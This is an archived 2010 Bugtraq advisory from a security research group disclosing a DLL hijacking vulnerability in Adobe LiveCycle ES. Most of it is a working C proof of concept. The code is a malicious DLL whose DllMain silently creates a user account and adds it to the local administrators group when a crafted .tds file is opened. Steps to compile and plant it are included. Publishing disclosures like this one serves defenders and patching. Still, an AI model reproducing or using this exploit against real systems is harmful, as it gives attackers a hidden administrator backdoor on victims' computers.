Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Adobe LiveCycle ES DLL Hijacking Exploit (.dll)

From: admin () bugreport ir
Date: Mon, 13 Sep 2010 18:41:21 +0430
##########################www.BugReport.ir########################################
#
#        AmnPardaz Security Research Team
#
# Title:                Adobe LiveCycle ES DLL Hijacking Exploit (.dll)
# Vendor:               http://www.adobe.com/products/livecycle/
# Vulnerable Version:   8.2.1.3144.1.471865
# Exploitation:         Remote Code Execution
###################################################################################

####################
- Description:
####################
Adobe® LiveCycle® Enterprise Suite (ES) software can help you extend the value of existing back-end systems by enabling developers to build and deploy applications quickly and easily, and by empowering business users to manage application environments based on their specific needs. With Adobe LiveCycle ES, you can make it easier for people to interact with information through intuitive user experiences, improve efficiencies through business process automation, and enhance customer service through personalized communications management. 


####################
- Vulnerability:
####################

+--> DLL Hijacking
Compile the exploit and rename to .dll, create a file in the same dir with *.tds extension. 
        (Vulnerability is discovered by DLLHijackAuditKit v2)

####################
- Exploits/PoCs:
####################

//tested on Windows XP SP3
#include "stdafx.h"
#include "windows.h"
#include <cstdlib>

int main()
{
  system("net user apuser appass /add");
  system("net localgroup administrators apuser /add");
  exit(0);
  return 0;
}


BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                                         )
{
        switch (ul_reason_for_call)
        {
        case DLL_PROCESS_ATTACH:
                main();
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
                break;
        }

        return TRUE;
}

####################
- Solution:
####################

http://blogs.technet.com/b/srd/archive/2010/08/23/more-information-about-dll-preloading-remote-attack-vector.aspx

####################
- Original Advisory:
####################

http://www.bugreport.ir/index_74.htm

####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
Previous By Date Next
Previous By Thread Next

Current thread: